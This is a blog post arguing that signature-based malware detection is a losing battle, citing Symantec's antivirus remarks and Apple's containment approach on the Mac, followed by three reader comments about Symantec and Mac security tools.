Malware detection is a losing battle

BurnIconXAs personal computing took off in the 80s, people progressively relied upon security software to remove viruses, trojans, spyware, and other malicious software from their systems. For a couple of decades, it seemed such software was a necessity, especially for platforms that suffered a larger onslaught of malware than others (namely Windows and the classic Mac OS, in comparison to OS X). Malware is still an ongoing and major problem; however, it appears that this classic approach to stemming the flow of malware is a progressively failed effort.

Recently Brian Dye, the senior vice president for information security at Symantec, stated to the Wall Street Journal that antivirus “is dead” and is not being pursued as a moneymaker anymore, suggesting the classic approach for identifying variants of malware is a losing battle overall.

The amount of malware that security companies are seeing come out every year is increasing exponentially (PDF), and with only a few such companies matched against the ever-increasing hacking and malware communities, there is almost no way for them to keep up with identifying malware and creating effective definitions against it. For example, recall the cat-and-mouse battle for security efforts against the Flashback malware, where variants that circumvented new definitions were released sometimes within days of updates being available.

Furthermore, hackers are finding novel ways to target systems that forego the need for classic malware. These have sometimes come by hackers capitalizing on industry mistakes, such as was the case with the recently-found, but long-standing Heartbleed OpenSSL snafu.

What this means is the landscape for cybersecurity is changing to where even more than ever, you cannot rely on a security suite to keep your system safe. If a vulnerability is found, malware variants that exploit it are often spread through malware circles faster than a fix can be issued by the developer.

While there will always be some benefit from tracking down threats and deleting them, this will always be a daunting task to keep effective. However, to one extent, this has always been somewhat the case. Security tools are just options to help you discover and prevent malware from being installed, and are not always successful or correct in their efforts.

If you look at Apple’s approach on this matter, the company has set active malware detection on the back burner. Instead of focusing efforts on its XProtect malware detection system, Apple has been favoring containment, not of malware itself, but of the possibilities for exploit and access to user data.

Every program Apple hosts on its App Store is required to be sandboxed and digitally signed so only they can be executed when security measures such as GateKeeper are enabled. For personal data, Apple is focusing on encryption and the use of passwords in keychains, offering the easy generation of high-quality passwords for authenticating to Web sites, and managing them in the user’s keychain.

By using these options Apple provides with your Mac, you can stay ahead of the curve in terms of security. Apple does offer some services such as its iCloud keychain, which offer convenience more than additional security, but these are optional. For now, as efforts such as these lean towards blocking malware from the inside instead of eradicating it, there are several things you can do to keep up with the trend and not only ensure your data is safe even if malware ends up on your system, but also avoid malware altogether.

These basically revolve around forgoing the reliance on a security software package to keep you safe, and instead concentrating on layering up your security, starting with how you manage passwords, and then how you package sensitive files, and finally, how you configure your system for use. That being said, the use of anti-malware tools will help this effort, but should progressively not be relied upon as the sole source for your computer’s security.

3 thoughts on “Malware detection is a losing battle

  1. thewiteddog11

    I think what Brian Dye is really saying is that there is no longer enough money in the security software business to cover the costs of keeping up with the pace of change in security threats. This could be due to the competition Symantec faces in their market niche at least as much as to the nature of the security threats themselves. So far, at least, none of his competitors have shown similar signs of giving up the fight. Indeed, if Symantec falls, that will leave more room for the competition and, theoretically, more money to be made by them in the security business as they vie for Symantec’s market share. Symantec has a track record of giving up when the going gets difficult, as they did more than a decade ago when they dropped development of Norton Disk Doctor at the advent of OS X, leaving the field clear for Micromat, Alsoft and Prosoft, authors of TechTool Pro, DiskWarrior and Drive Genius respectively.

    It’s certainly the case that the nature of malware is changing rapidly. However, the notion that users can keep up with this changing landscape when professional security experts like those presumably working at Symantec strains credulity. It’s also hard to understand how Apple can give up on their own efforts to meet ongoing threats with their XProtect technology – just when we thought Apple was finally taking their customers’ security seriously.

    No doubt a multi-layered approach to security is advisable. How you expect average users to understand, let alone implement, such a strategy is beyond me – as I expect it is beyond them.

  2. Jay

    Symantec has been garbage as long as I can remember and definitely as long as I’ve been actively testing them ( and their bad reputation in Mac circles is completely justified. I do have to say their latest suite (version 12 and up) runs remarkably smooth on OS X with little to no system impact or resource hogging. However after years of bad software their reputation is hard if not impossible to shake. Their firewall software is decent, their AV for Mac is simply no good, even if it was free.

    If they give up the AV as we know it today, it won’t be a loss to Mac users.

  3. Derek Currie

    [Restraining my comments…] I have to point out that Symantec has consistently had a grudge against Macs. They single-handedly instigated the rubbish ‘security through obscurity’ myth about OS X in 2005 solely as a FUD scare tactic to sell more Norton’s Anti-Virus. I can’t forgive them for such behavior. IMHO, what we’re hearing from Brian Dye is a Symantec death throw after particularly poor recent profits. From the perspective of a Mac user, I’d be extremely pleased to see Symantec remove their worst-in-class anti-malware from the Mac market. I’d instead champion just about any alternatives (apart from, of course, awful MacKeeper and the ruin that was made of iAntiVirus). ClamXav is a great free app for everyone, protecting against most malware for both Mac and Windows.

Comments are closed.